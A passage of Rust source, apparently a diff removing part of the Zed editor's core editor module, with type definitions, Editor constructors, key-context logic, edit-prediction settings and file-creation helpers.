Vec>>, -} - -#[doc(hidden)] -pub struct RenameState { - pub range: Range, - pub old_name: Arc, - pub editor: Entity, - block_id: CustomBlockId, -} - -struct InvalidationStack(Vec); - -struct RegisteredInlineCompletionProvider { - provider: Arc, - _subscription: Subscription, -} - -#[derive(Debug, PartialEq, Eq)] -pub struct ActiveDiagnosticGroup { - pub active_range: Range, - pub active_message: String, - pub group_id: usize, - pub blocks: HashSet, -} - -#[derive(Debug, PartialEq, Eq)] - -pub(crate) enum ActiveDiagnostic { - None, - All, - Group(ActiveDiagnosticGroup), -} - -#[derive(Serialize, Deserialize, Clone, Debug)] -pub struct ClipboardSelection { - /// The number of bytes in this selection. - pub len: usize, - /// Whether this was a full-line selection. - pub is_entire_line: bool, - /// The indentation of the first line when this content was originally copied. - pub first_line_indent: u32, -} - -// selections, scroll behavior, was newest selection reversed -type SelectSyntaxNodeHistoryState = ( - Box<[Selection]>, - SelectSyntaxNodeScrollBehavior, - bool, -); - -#[derive(Default)] -struct SelectSyntaxNodeHistory { - stack: Vec, - // disable temporarily to allow changing selections without losing the stack - pub disable_clearing: bool, -} - -impl SelectSyntaxNodeHistory { - pub fn try_clear(&mut self) { - if !self.disable_clearing { - self.stack.clear(); - } - } - - pub fn push(&mut self, selection: SelectSyntaxNodeHistoryState) { - self.stack.push(selection); - } - - pub fn pop(&mut self) -> Option { - self.stack.pop() - } -} - -enum SelectSyntaxNodeScrollBehavior { - CursorTop, - FitSelection, - CursorBottom, -} - -#[derive(Debug)] -pub(crate) struct NavigationData { - cursor_anchor: Anchor, - cursor_position: Point, - scroll_anchor: ScrollAnchor, - scroll_top_row: u32, -} - -#[derive(Debug, Clone, Copy, PartialEq, Eq)] -pub enum GotoDefinitionKind { - Symbol, - Declaration, - Type, - Implementation, -} - -#[derive(Debug, Clone)] -enum 
InlayHintRefreshReason { - ModifiersChanged(bool), - Toggle(bool), - SettingsChange(InlayHintSettings), - NewLinesShown, - BufferEdited(HashSet>), - RefreshRequested, - ExcerptsRemoved(Vec), -} - -impl InlayHintRefreshReason { - fn description(&self) -> &'static str { - match self { - Self::ModifiersChanged(_) => "modifiers changed", - Self::Toggle(_) => "toggle", - Self::SettingsChange(_) => "settings change", - Self::NewLinesShown => "new lines shown", - Self::BufferEdited(_) => "buffer edited", - Self::RefreshRequested => "refresh requested", - Self::ExcerptsRemoved(_) => "excerpts removed", - } - } -} - -pub enum FormatTarget { - Buffers, - Ranges(Vec>), -} - -pub(crate) struct FocusedBlock { - id: BlockId, - focus_handle: WeakFocusHandle, -} - -#[derive(Clone)] -enum JumpData { - MultiBufferRow { - row: MultiBufferRow, - line_offset_from_top: u32, - }, - MultiBufferPoint { - excerpt_id: ExcerptId, - position: Point, - anchor: text::Anchor, - line_offset_from_top: u32, - }, -} - -pub enum MultibufferSelectionMode { - First, - All, -} - -#[derive(Clone, Copy, Debug, Default)] -pub struct RewrapOptions { - pub override_language_settings: bool, - pub preserve_existing_whitespace: bool, -} - -impl Editor { - pub fn single_line(window: &mut Window, cx: &mut Context) -> Self { - let buffer = cx.new(|cx| Buffer::local("", cx)); - let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); - Self::new( - EditorMode::SingleLine { auto_width: false }, - buffer, - None, - window, - cx, - ) - } - - pub fn multi_line(window: &mut Window, cx: &mut Context) -> Self { - let buffer = cx.new(|cx| Buffer::local("", cx)); - let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); - Self::new(EditorMode::full(), buffer, None, window, cx) - } - - pub fn auto_width(window: &mut Window, cx: &mut Context) -> Self { - let buffer = cx.new(|cx| Buffer::local("", cx)); - let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); - Self::new( - EditorMode::SingleLine { auto_width: 
true }, - buffer, - None, - window, - cx, - ) - } - - pub fn auto_height(max_lines: usize, window: &mut Window, cx: &mut Context) -> Self { - let buffer = cx.new(|cx| Buffer::local("", cx)); - let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); - Self::new( - EditorMode::AutoHeight { max_lines }, - buffer, - None, - window, - cx, - ) - } - - pub fn for_buffer( - buffer: Entity, - project: Option>, - window: &mut Window, - cx: &mut Context, - ) -> Self { - let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); - Self::new(EditorMode::full(), buffer, project, window, cx) - } - - pub fn for_multibuffer( - buffer: Entity, - project: Option>, - window: &mut Window, - cx: &mut Context, - ) -> Self { - Self::new(EditorMode::full(), buffer, project, window, cx) - } - - pub fn clone(&self, window: &mut Window, cx: &mut Context) -> Self { - let mut clone = Self::new( - self.mode, - self.buffer.clone(), - self.project.clone(), - window, - cx, - ); - self.display_map.update(cx, |display_map, cx| { - let snapshot = display_map.snapshot(cx); - clone.display_map.update(cx, |display_map, cx| { - display_map.set_state(&snapshot, cx); - }); - }); - clone.folds_did_change(cx); - clone.selections.clone_state(&self.selections); - clone.scroll_manager.clone_state(&self.scroll_manager); - clone.searchable = self.searchable; - clone.read_only = self.read_only; - clone - } - - pub fn new( - mode: EditorMode, - buffer: Entity, - project: Option>, - window: &mut Window, - cx: &mut Context, - ) -> Self { - let style = window.text_style(); - let font_size = style.font_size.to_pixels(window.rem_size()); - let editor = cx.entity().downgrade(); - let fold_placeholder = FoldPlaceholder { - constrain_width: true, - render: Arc::new(move |fold_id, fold_range, cx| { - let editor = editor.clone(); - div() - .id(fold_id) - .bg(cx.theme().colors().ghost_element_background) - .hover(|style| style.bg(cx.theme().colors().ghost_element_hover)) - .active(|style| 
style.bg(cx.theme().colors().ghost_element_active)) - .rounded_xs() - .size_full() - .cursor_pointer() - .child("⋯") - .on_mouse_down(MouseButton::Left, |_, _, cx| cx.stop_propagation()) - .on_click(move |_, _window, cx| { - editor - .update(cx, |editor, cx| { - editor.unfold_ranges( - &[fold_range.start..fold_range.end], - true, - false, - cx, - ); - cx.stop_propagation(); - }) - .ok(); - }) - .into_any() - }), - merge_adjacent: true, - ..Default::default() - }; - let display_map = cx.new(|cx| { - DisplayMap::new( - buffer.clone(), - style.font(), - font_size, - None, - FILE_HEADER_HEIGHT, - MULTI_BUFFER_EXCERPT_HEADER_HEIGHT, - fold_placeholder, - cx, - ) - }); - - let selections = SelectionsCollection::new(display_map.clone(), buffer.clone()); - - let blink_manager = cx.new(|cx| BlinkManager::new(CURSOR_BLINK_INTERVAL, cx)); - - let soft_wrap_mode_override = matches!(mode, EditorMode::SingleLine { .. }) - .then(|| language_settings::SoftWrap::None); - - let mut project_subscriptions = Vec::new(); - if mode.is_full() { - if let Some(project) = project.as_ref() { - project_subscriptions.push(cx.subscribe_in( - project, - window, - |editor, _, event, window, cx| match event { - project::Event::RefreshCodeLens => { - // we always query lens with actions, without storing them, always refreshing them - } - project::Event::RefreshInlayHints => { - editor - .refresh_inlay_hints(InlayHintRefreshReason::RefreshRequested, cx); - } - project::Event::SnippetEdit(id, snippet_edits) => { - if let Some(buffer) = editor.buffer.read(cx).buffer(*id) { - let focus_handle = editor.focus_handle(cx); - if focus_handle.is_focused(window) { - let snapshot = buffer.read(cx).snapshot(); - for (range, snippet) in snippet_edits { - let editor_range = - language::range_from_lsp(*range).to_offset(&snapshot); - editor - .insert_snippet( - &[editor_range], - snippet.clone(), - window, - cx, - ) - .ok(); - } - } - } - } - _ => {} - }, - )); - if let Some(task_inventory) = project - .read(cx) - 
.task_store() - .read(cx) - .task_inventory() - .cloned() - { - project_subscriptions.push(cx.observe_in( - &task_inventory, - window, - |editor, _, window, cx| { - editor.tasks_update_task = Some(editor.refresh_runnables(window, cx)); - }, - )); - }; - - project_subscriptions.push(cx.subscribe_in( - &project.read(cx).breakpoint_store(), - window, - |editor, _, event, window, cx| match event { - BreakpointStoreEvent::ClearDebugLines => { - editor.clear_row_highlights::(); - editor.refresh_inline_values(cx); - } - BreakpointStoreEvent::SetDebugLine => { - if editor.go_to_active_debug_line(window, cx) { - cx.stop_propagation(); - } - - editor.refresh_inline_values(cx); - } - _ => {} - }, - )); - } - } - - let buffer_snapshot = buffer.read(cx).snapshot(cx); - - let inlay_hint_settings = - inlay_hint_settings(selections.newest_anchor().head(), &buffer_snapshot, cx); - let focus_handle = cx.focus_handle(); - cx.on_focus(&focus_handle, window, Self::handle_focus) - .detach(); - cx.on_focus_in(&focus_handle, window, Self::handle_focus_in) - .detach(); - cx.on_focus_out(&focus_handle, window, Self::handle_focus_out) - .detach(); - cx.on_blur(&focus_handle, window, Self::handle_blur) - .detach(); - - let show_indent_guides = if matches!(mode, EditorMode::SingleLine { .. }) { - Some(false) - } else { - None - }; - - let breakpoint_store = match (mode, project.as_ref()) { - (EditorMode::Full { .. 
}, Some(project)) => Some(project.read(cx).breakpoint_store()), - _ => None, - }; - - let mut code_action_providers = Vec::new(); - let mut load_uncommitted_diff = None; - if let Some(project) = project.clone() { - load_uncommitted_diff = Some( - get_uncommitted_diff_for_buffer( - &project, - buffer.read(cx).all_buffers(), - buffer.clone(), - cx, - ) - .shared(), - ); - code_action_providers.push(Rc::new(project) as Rc<_>); - } - - let mut this = Self { - focus_handle, - show_cursor_when_unfocused: false, - last_focused_descendant: None, - buffer: buffer.clone(), - display_map: display_map.clone(), - selections, - scroll_manager: ScrollManager::new(cx), - columnar_selection_tail: None, - add_selections_state: None, - select_next_state: None, - select_prev_state: None, - selection_history: Default::default(), - autoclose_regions: Default::default(), - snippet_stack: Default::default(), - select_syntax_node_history: SelectSyntaxNodeHistory::default(), - ime_transaction: Default::default(), - active_diagnostics: ActiveDiagnostic::None, - show_inline_diagnostics: ProjectSettings::get_global(cx).diagnostics.inline.enabled, - inline_diagnostics_update: Task::ready(()), - inline_diagnostics: Vec::new(), - soft_wrap_mode_override, - hard_wrap: None, - completion_provider: project.clone().map(|project| Box::new(project) as _), - semantics_provider: project.clone().map(|project| Rc::new(project) as _), - collaboration_hub: project.clone().map(|project| Box::new(project) as _), - project, - blink_manager: blink_manager.clone(), - show_local_selections: true, - show_scrollbars: true, - disable_scrolling: false, - mode, - show_breadcrumbs: EditorSettings::get_global(cx).toolbar.breadcrumbs, - show_gutter: mode.is_full(), - show_line_numbers: None, - use_relative_line_numbers: None, - disable_expand_excerpt_buttons: false, - show_git_diff_gutter: None, - show_code_actions: None, - show_runnables: None, - show_breakpoints: None, - show_wrap_guides: None, - show_indent_guides, - 
placeholder_text: None, - highlight_order: 0, - highlighted_rows: HashMap::default(), - background_highlights: Default::default(), - gutter_highlights: TreeMap::default(), - scrollbar_marker_state: ScrollbarMarkerState::default(), - active_indent_guides_state: ActiveIndentGuidesState::default(), - nav_history: None, - context_menu: RefCell::new(None), - context_menu_options: None, - mouse_context_menu: None, - completion_tasks: Default::default(), - inline_blame_popover: Default::default(), - signature_help_state: SignatureHelpState::default(), - auto_signature_help: None, - find_all_references_task_sources: Vec::new(), - next_completion_id: 0, - next_inlay_id: 0, - code_action_providers, - available_code_actions: Default::default(), - code_actions_task: Default::default(), - quick_selection_highlight_task: Default::default(), - debounced_selection_highlight_task: Default::default(), - document_highlights_task: Default::default(), - linked_editing_range_task: Default::default(), - pending_rename: Default::default(), - searchable: true, - cursor_shape: EditorSettings::get_global(cx) - .cursor_shape - .unwrap_or_default(), - current_line_highlight: None, - autoindent_mode: Some(AutoindentMode::EachLine), - collapse_matches: false, - workspace: None, - input_enabled: true, - use_modal_editing: mode.is_full(), - read_only: false, - use_autoclose: true, - use_auto_surround: true, - auto_replace_emoji_shortcode: false, - jsx_tag_auto_close_enabled_in_any_buffer: false, - leader_peer_id: None, - remote_id: None, - hover_state: Default::default(), - pending_mouse_down: None, - hovered_link_state: Default::default(), - edit_prediction_provider: None, - active_inline_completion: None, - stale_inline_completion_in_menu: None, - edit_prediction_preview: EditPredictionPreview::Inactive { - released_too_fast: false, - }, - inline_diagnostics_enabled: mode.is_full(), - inline_value_cache: InlineValueCache::new(inlay_hint_settings.show_value_hints), - inlay_hint_cache: 
InlayHintCache::new(inlay_hint_settings), - - gutter_hovered: false, - pixel_position_of_newest_cursor: None, - last_bounds: None, - last_position_map: None, - expect_bounds_change: None, - gutter_dimensions: GutterDimensions::default(), - style: None, - show_cursor_names: false, - hovered_cursors: Default::default(), - next_editor_action_id: EditorActionId::default(), - editor_actions: Rc::default(), - inline_completions_hidden_for_vim_mode: false, - show_inline_completions_override: None, - menu_inline_completions_policy: MenuInlineCompletionsPolicy::ByProvider, - edit_prediction_settings: EditPredictionSettings::Disabled, - edit_prediction_indent_conflict: false, - edit_prediction_requires_modifier_in_indent_conflict: true, - custom_context_menu: None, - show_git_blame_gutter: false, - show_git_blame_inline: false, - show_selection_menu: None, - show_git_blame_inline_delay_task: None, - git_blame_inline_enabled: ProjectSettings::get_global(cx).git.inline_blame_enabled(), - render_diff_hunk_controls: Arc::new(render_diff_hunk_controls), - serialize_dirty_buffers: ProjectSettings::get_global(cx) - .session - .restore_unsaved_buffers, - blame: None, - blame_subscription: None, - tasks: Default::default(), - - breakpoint_store, - gutter_breakpoint_indicator: (None, None), - _subscriptions: vec![ - cx.observe(&buffer, Self::on_buffer_changed), - cx.subscribe_in(&buffer, window, Self::on_buffer_event), - cx.observe_in(&display_map, window, Self::on_display_map_changed), - cx.observe(&blink_manager, |_, _, cx| cx.notify()), - cx.observe_global_in::(window, Self::settings_changed), - observe_buffer_font_size_adjustment(cx, |_, cx| cx.notify()), - cx.observe_window_activation(window, |editor, window, cx| { - let active = window.is_window_active(); - editor.blink_manager.update(cx, |blink_manager, cx| { - if active { - blink_manager.enable(cx); - } else { - blink_manager.disable(cx); - } - }); - }), - ], - tasks_update_task: None, - linked_edit_ranges: Default::default(), 
- in_project_search: false, - previous_search_ranges: None, - breadcrumb_header: None, - focused_block: None, - next_scroll_position: NextScrollCursorCenterTopBottom::default(), - addons: HashMap::default(), - registered_buffers: HashMap::default(), - _scroll_cursor_center_top_bottom_task: Task::ready(()), - selection_mark_mode: false, - toggle_fold_multiple_buffers: Task::ready(()), - serialize_selections: Task::ready(()), - serialize_folds: Task::ready(()), - text_style_refinement: None, - load_diff_task: load_uncommitted_diff, - mouse_cursor_hidden: false, - hide_mouse_mode: EditorSettings::get_global(cx) - .hide_mouse - .unwrap_or_default(), - change_list: ChangeList::new(), - }; - if let Some(breakpoints) = this.breakpoint_store.as_ref() { - this._subscriptions - .push(cx.observe(breakpoints, |_, _, cx| { - cx.notify(); - })); - } - this.tasks_update_task = Some(this.refresh_runnables(window, cx)); - this._subscriptions.extend(project_subscriptions); - - this._subscriptions.push(cx.subscribe_in( - &cx.entity(), - window, - |editor, _, e: &EditorEvent, window, cx| match e { - EditorEvent::ScrollPositionChanged { local, .. } => { - if *local { - let new_anchor = editor.scroll_manager.anchor(); - let snapshot = editor.snapshot(window, cx); - editor.update_restoration_data(cx, move |data| { - data.scroll_position = ( - new_anchor.top_row(&snapshot.buffer_snapshot), - new_anchor.offset, - ); - }); - editor.hide_signature_help(cx, SignatureHelpHiddenBy::Escape); - editor.inline_blame_popover.take(); - } - } - EditorEvent::Edited { .. 
} => { - if !vim_enabled(cx) { - let (map, selections) = editor.selections.all_adjusted_display(cx); - let pop_state = editor - .change_list - .last() - .map(|previous| { - previous.len() == selections.len() - && previous.iter().enumerate().all(|(ix, p)| { - p.to_display_point(&map).row() - == selections[ix].head().row() - }) - }) - .unwrap_or(false); - let new_positions = selections - .into_iter() - .map(|s| map.display_point_to_anchor(s.head(), Bias::Left)) - .collect(); - editor - .change_list - .push_to_change_list(pop_state, new_positions); - } - } - _ => (), - }, - )); - - if let Some(dap_store) = this - .project - .as_ref() - .map(|project| project.read(cx).dap_store()) - { - let weak_editor = cx.weak_entity(); - - this._subscriptions - .push( - cx.observe_new::(move |_, _, cx| { - let session_entity = cx.entity(); - weak_editor - .update(cx, |editor, cx| { - editor._subscriptions.push( - cx.subscribe(&session_entity, Self::on_debug_session_event), - ); - }) - .ok(); - }), - ); - - for session in dap_store.read(cx).sessions().cloned().collect::>() { - this._subscriptions - .push(cx.subscribe(&session, Self::on_debug_session_event)); - } - } - - this.end_selection(window, cx); - this.scroll_manager.show_scrollbars(window, cx); - jsx_tag_auto_close::refresh_enabled_in_any_buffer(&mut this, &buffer, cx); - - if mode.is_full() { - let should_auto_hide_scrollbars = cx.should_auto_hide_scrollbars(); - cx.set_global(ScrollbarAutoHide(should_auto_hide_scrollbars)); - - if this.git_blame_inline_enabled { - this.git_blame_inline_enabled = true; - this.start_git_blame_inline(false, window, cx); - } - - this.go_to_active_debug_line(window, cx); - - if let Some(buffer) = buffer.read(cx).as_singleton() { - if let Some(project) = this.project.as_ref() { - let handle = project.update(cx, |project, cx| { - project.register_buffer_with_language_servers(&buffer, cx) - }); - this.registered_buffers - .insert(buffer.read(cx).remote_id(), handle); - } - } - } - - 
this.report_editor_event("Editor Opened", None, cx); - this - } - - pub fn deploy_mouse_context_menu( - &mut self, - position: gpui::Point, - context_menu: Entity, - window: &mut Window, - cx: &mut Context, - ) { - self.mouse_context_menu = Some(MouseContextMenu::new( - self, - crate::mouse_context_menu::MenuPosition::PinnedToScreen(position), - context_menu, - window, - cx, - )); - } - - pub fn mouse_menu_is_focused(&self, window: &Window, cx: &App) -> bool { - self.mouse_context_menu - .as_ref() - .is_some_and(|menu| menu.context_menu.focus_handle(cx).is_focused(window)) - } - - fn key_context(&self, window: &Window, cx: &App) -> KeyContext { - self.key_context_internal(self.has_active_inline_completion(), window, cx) - } - - fn key_context_internal( - &self, - has_active_edit_prediction: bool, - window: &Window, - cx: &App, - ) -> KeyContext { - let mut key_context = KeyContext::new_with_defaults(); - key_context.add("Editor"); - let mode = match self.mode { - EditorMode::SingleLine { .. } => "single_line", - EditorMode::AutoHeight { .. } => "auto_height", - EditorMode::Full { .. } => "full", - }; - - if EditorSettings::jupyter_enabled(cx) { - key_context.add("jupyter"); - } - - key_context.set("mode", mode); - if self.pending_rename.is_some() { - key_context.add("renaming"); - } - - match self.context_menu.borrow().as_ref() { - Some(CodeContextMenu::Completions(_)) => { - key_context.add("menu"); - key_context.add("showing_completions"); - } - Some(CodeContextMenu::CodeActions(_)) => { - key_context.add("menu"); - key_context.add("showing_code_actions") - } - None => {} - } - - // Disable vim contexts when a sub-editor (e.g. rename/inline assistant) is focused. 
- if !self.focus_handle(cx).contains_focused(window, cx) - || (self.is_focused(window) || self.mouse_menu_is_focused(window, cx)) - { - for addon in self.addons.values() { - addon.extend_key_context(&mut key_context, cx) - } - } - - if let Some(singleton_buffer) = self.buffer.read(cx).as_singleton() { - if let Some(extension) = singleton_buffer - .read(cx) - .file() - .and_then(|file| file.path().extension()?.to_str()) - { - key_context.set("extension", extension.to_string()); - } - } else { - key_context.add("multibuffer"); - } - - if has_active_edit_prediction { - if self.edit_prediction_in_conflict() { - key_context.add(EDIT_PREDICTION_CONFLICT_KEY_CONTEXT); - } else { - key_context.add(EDIT_PREDICTION_KEY_CONTEXT); - key_context.add("copilot_suggestion"); - } - } - - if self.selection_mark_mode { - key_context.add("selection_mode"); - } - - key_context - } - - pub fn hide_mouse_cursor(&mut self, origin: &HideMouseCursorOrigin) { - self.mouse_cursor_hidden = match origin { - HideMouseCursorOrigin::TypingAction => { - matches!( - self.hide_mouse_mode, - HideMouseMode::OnTyping | HideMouseMode::OnTypingAndMovement - ) - } - HideMouseCursorOrigin::MovementAction => { - matches!(self.hide_mouse_mode, HideMouseMode::OnTypingAndMovement) - } - }; - } - - pub fn edit_prediction_in_conflict(&self) -> bool { - if !self.show_edit_predictions_in_menu() { - return false; - } - - let showing_completions = self - .context_menu - .borrow() - .as_ref() - .map_or(false, |context| { - matches!(context, CodeContextMenu::Completions(_)) - }); - - showing_completions - || self.edit_prediction_requires_modifier() - // Require modifier key when the cursor is on leading whitespace, to allow `tab` - // bindings to insert tab characters. 
- || (self.edit_prediction_requires_modifier_in_indent_conflict && self.edit_prediction_indent_conflict) - } - - pub fn accept_edit_prediction_keybind( - &self, - window: &Window, - cx: &App, - ) -> AcceptEditPredictionBinding { - let key_context = self.key_context_internal(true, window, cx); - let in_conflict = self.edit_prediction_in_conflict(); - - AcceptEditPredictionBinding( - window - .bindings_for_action_in_context(&AcceptEditPrediction, key_context) - .into_iter() - .filter(|binding| { - !in_conflict - || binding - .keystrokes() - .first() - .map_or(false, |keystroke| keystroke.modifiers.modified()) - }) - .rev() - .min_by_key(|binding| { - binding - .keystrokes() - .first() - .map_or(u8::MAX, |k| k.modifiers.number_of_modifiers()) - }), - ) - } - - pub fn new_file( - workspace: &mut Workspace, - _: &workspace::NewFile, - window: &mut Window, - cx: &mut Context, - ) { - Self::new_in_workspace(workspace, window, cx).detach_and_prompt_err( - "Failed to create buffer", - window, - cx, - |e, _, _| match e.error_code() { - ErrorCode::RemoteUpgradeRequired => Some(format!( - "The remote instance of Zed does not support this yet. 
It must be upgraded to {}", - e.error_tag("required").unwrap_or("the latest version") - )), - _ => None, - }, - ); - } - - pub fn new_in_workspace( - workspace: &mut Workspace, - window: &mut Window, - cx: &mut Context, - ) -> Task>> { - let project = workspace.project().clone(); - let create = project.update(cx, |project, cx| project.create_buffer(cx)); - - cx.spawn_in(window, async move |workspace, cx| { - let buffer = create.await?; - workspace.update_in(cx, |workspace, window, cx| { - let editor = - cx.new(|cx| Editor::for_buffer(buffer, Some(project.clone()), window, cx)); - workspace.add_item_to_active_pane(Box::new(editor.clone()), None, true, window, cx); - editor - }) - }) - } - - fn new_file_vertical( - workspace: &mut Workspace, - _: &workspace::NewFileSplitVertical, - window: &mut Window, - cx: &mut Context, - ) { - Self::new_file_in_direction(workspace, SplitDirection::vertical(cx), window, cx) - } - - fn new_file_horizontal( - workspace: &mut Workspace, - _: &workspace::NewFileSplitHorizontal, - window: &mut Window, - cx: &mut Context, - ) { - Self::new_file_in_direction(workspace, SplitDirection::horizontal(cx), window, cx) - } - - fn new_file_in_direction( - workspace: &mut Workspace, - direction: SplitDirection, - window: &mut Window, - cx: &mut Context, - ) { - let project = workspace.project().clone(); - let create = project.update(cx, |project, cx| project.create_buffer(cx)); - - cx.spawn_in(window, async move |workspace, cx| { - let buffer = create.await?; - workspace.update_in(cx, move |workspace, window, cx| { - workspace.split_item( - direction, - Box::new( - cx.new(|cx| Editor::for_buffer(buffer, Some(project.clone()), window, cx)), - ), - window, - cx, - ) - })?; - anyhow::Ok(()) - }) - .detach_and_prompt_err("Failed to create buffer", window, cx, |e, _, _| { - match e.error_code() { - ErrorCode::RemoteUpgradeRequired => Some(format!( - "The remote instance of Zed does not support this yet. 
It must be upgraded to {}", - e.error_tag("required").unwrap_or("the latest version") - )), - _ => None, - } - }); - } - - pub fn leader_peer_id(&self) -> Option { - self.leader_peer_id - } - - pub fn buffer(&self) -> &Entity { - &self.buffer - } - - pub fn workspace(&self) -> Option> { - self.workspace.as_ref()?.0.upgrade() - } - - pub fn title<'a>(&self, cx: &'a App) -> Cow<'a, str> { - self.buffer().read(cx).title(cx) - } - - pub fn snapshot(&self, window: &mut Window, cx: &mut App) -> EditorSnapshot { - let git_blame_gutter_max_author_length = self - .render_git_blame_gutter(cx) - .then(|| { - if let Some(blame) = self.blame.as_ref() { - let max_author_length = - blame.update(cx, |blame, cx| blame.max_author_length(cx)); - Some(max_author_length) - } else { - None - } - }) - .flatten(); - - EditorSnapshot { - mode: self.mode, - show_gutter: self.show_gutter, - show_line_numbers: self.show_line_numbers, - show_git_diff_gutter: self.show_git_diff_gutter, - show_code_actions: self.show_code_actions, - show_runnables: self.show_runnables, - show_breakpoints: self.show_breakpoints, - git_blame_gutter_max_author_length, - display_snapshot: self.display_map.update(cx, |map, cx| map.snapshot(cx)), - scroll_anchor: self.scroll_manager.anchor(), - ongoing_scroll: self.scroll_manager.ongoing_scroll(), - placeholder_text: self.placeholder_text.clone(), - is_focused: self.focus_handle.is_focused(window), - current_line_highlight: self - .current_line_highlight - .unwrap_or_else(|| EditorSettings::get_global(cx).current_line_highlight), - gutter_hovered: self.gutter_hovered, - } - } - - pub fn language_at(&self, point: T, cx: &App) -> Option> { - self.buffer.read(cx).language_at(point, cx) - } - - pub fn file_at(&self, point: T, cx: &App) -> Option> { - self.buffer.read(cx).read(cx).file_at(point).cloned() - } - - pub fn active_excerpt( - &self, - cx: &App, - ) -> Option<(ExcerptId, Entity, Range)> { - self.buffer - .read(cx) - 
.excerpt_containing(self.selections.newest_anchor().head(), cx) - } - - pub fn mode(&self) -> EditorMode { - self.mode - } - - pub fn set_mode(&mut self, mode: EditorMode) { - self.mode = mode; - } - - pub fn collaboration_hub(&self) -> Option<&dyn CollaborationHub> { - self.collaboration_hub.as_deref() - } - - pub fn set_collaboration_hub(&mut self, hub: Box) { - self.collaboration_hub = Some(hub); - } - - pub fn set_in_project_search(&mut self, in_project_search: bool) { - self.in_project_search = in_project_search; - } - - pub fn set_custom_context_menu( - &mut self, - f: impl 'static - + Fn( - &mut Self, - DisplayPoint, - &mut Window, - &mut Context, - ) -> Option>, - ) { - self.custom_context_menu = Some(Box::new(f)) - } - - pub fn set_completion_provider(&mut self, provider: Option>) { - self.completion_provider = provider; - } - - pub fn semantics_provider(&self) -> Option> { - self.semantics_provider.clone() - } - - pub fn set_semantics_provider(&mut self, provider: Option>) { - self.semantics_provider = provider; - } - - pub fn set_edit_prediction_provider( - &mut self, - provider: Option>, - window: &mut Window, - cx: &mut Context, - ) where - T: EditPredictionProvider, - { - self.edit_prediction_provider = - provider.map(|provider| RegisteredInlineCompletionProvider { - _subscription: cx.observe_in(&provider, window, |this, _, window, cx| { - if this.focus_handle.is_focused(window) { - this.update_visible_inline_completion(window, cx); - } - }), - provider: Arc::new(provider), - }); - self.update_edit_prediction_settings(cx); - self.refresh_inline_completion(false, false, window, cx); - } - - pub fn placeholder_text(&self) -> Option<&str> { - self.placeholder_text.as_deref() - } - - pub fn set_placeholder_text( - &mut self, - placeholder_text: impl Into>, - cx: &mut Context, - ) { - let placeholder_text = Some(placeholder_text.into()); - if self.placeholder_text != placeholder_text { - self.placeholder_text = placeholder_text; - cx.notify(); - } - } - - 
pub fn set_cursor_shape(&mut self, cursor_shape: CursorShape, cx: &mut Context) { - self.cursor_shape = cursor_shape; - - // Disrupt blink for immediate user feedback that the cursor shape has changed - self.blink_manager.update(cx, BlinkManager::show_cursor); - - cx.notify(); - } - - pub fn set_current_line_highlight( - &mut self, - current_line_highlight: Option, - ) { - self.current_line_highlight = current_line_highlight; - } - - pub fn set_collapse_matches(&mut self, collapse_matches: bool) { - self.collapse_matches = collapse_matches; - } - - fn register_buffers_with_language_servers(&mut self, cx: &mut Context) { - let buffers = self.buffer.read(cx).all_buffers(); - let Some(project) = self.project.as_ref() else { - return; - }; - project.update(cx, |project, cx| { - for buffer in buffers { - self.registered_buffers - .entry(buffer.read(cx).remote_id()) - .or_insert_with(|| project.register_buffer_with_language_servers(&buffer, cx)); - } - }) - } - - pub fn range_for_match(&self, range: &Range) -> Range { - if self.collapse_matches { - return range.start..range.start; - } - range.clone() - } - - pub fn set_clip_at_line_ends(&mut self, clip: bool, cx: &mut Context) { - if self.display_map.read(cx).clip_at_line_ends != clip { - self.display_map - .update(cx, |map, _| map.clip_at_line_ends = clip); - } - } - - pub fn set_input_enabled(&mut self, input_enabled: bool) { - self.input_enabled = input_enabled; - } - - pub fn set_inline_completions_hidden_for_vim_mode( - &mut self, - hidden: bool, - window: &mut Window, - cx: &mut Context, - ) { - if hidden != self.inline_completions_hidden_for_vim_mode { - self.inline_completions_hidden_for_vim_mode = hidden; - if hidden { - self.update_visible_inline_completion(window, cx); - } else { - self.refresh_inline_completion(true, false, window, cx); - } - } - } - - pub fn set_menu_inline_completions_policy(&mut self, value: MenuInlineCompletionsPolicy) { - self.menu_inline_completions_policy = value; - } - - pub fn 
set_autoindent(&mut self, autoindent: bool) { - if autoindent { - self.autoindent_mode = Some(AutoindentMode::EachLine); - } else { - self.autoindent_mode = None; - } - } - - pub fn read_only(&self, cx: &App) -> bool { - self.read_only || self.buffer.read(cx).read_only() - } - - pub fn set_read_only(&mut self, read_only: bool) { - self.read_only = read_only; - } - - pub fn set_use_autoclose(&mut self, autoclose: bool) { - self.use_autoclose = autoclose; - } - - pub fn set_use_auto_surround(&mut self, auto_surround: bool) { - self.use_auto_surround = auto_surround; - } - - pub fn set_auto_replace_emoji_shortcode(&mut self, auto_replace: bool) { - self.auto_replace_emoji_shortcode = auto_replace; - } - - pub fn toggle_edit_predictions( - &mut self, - _: &ToggleEditPrediction, - window: &mut Window, - cx: &mut Context, - ) { - if self.show_inline_completions_override.is_some() { - self.set_show_edit_predictions(None, window, cx); - } else { - let show_edit_predictions = !self.edit_predictions_enabled(); - self.set_show_edit_predictions(Some(show_edit_predictions), window, cx); - } - } - - pub fn set_show_edit_predictions( - &mut self, - show_edit_predictions: Option, - window: &mut Window, - cx: &mut Context, - ) { - self.show_inline_completions_override = show_edit_predictions; - self.update_edit_prediction_settings(cx); - - if let Some(false) = show_edit_predictions { - self.discard_inline_completion(false, cx); - } else { - self.refresh_inline_completion(false, true, window, cx); - } - } - - fn inline_completions_disabled_in_scope( - &self, - buffer: &Entity, - buffer_position: language::Anchor, - cx: &App, - ) -> bool { - let snapshot = buffer.read(cx).snapshot(); - let settings = snapshot.settings_at(buffer_position, cx); - - let Some(scope) = snapshot.language_scope_at(buffer_position) else { - return false; - }; - - scope.override_name().map_or(false, |scope_name| { - settings - .edit_predictions_disabled_in - .iter() - .any(|s| s == scope_name) - }) - } - - 
